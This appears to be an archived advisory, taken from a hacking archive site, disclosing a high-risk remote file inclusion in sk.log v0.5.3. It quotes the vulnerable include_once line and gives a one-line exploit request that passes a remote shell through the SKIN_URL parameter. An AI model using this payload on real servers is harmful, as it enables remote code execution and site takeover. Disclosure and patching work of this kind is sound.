AOH :: HP Unsorted S :: TB12691.HTM

sk.log v0.5.3 Remote File Inclusion



sk.log v0.5.3 Remote File Inclusion
sk.log v0.5.3 Remote File Inclusion



++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it 
++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Code

+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );

+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]

+ Script Download
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.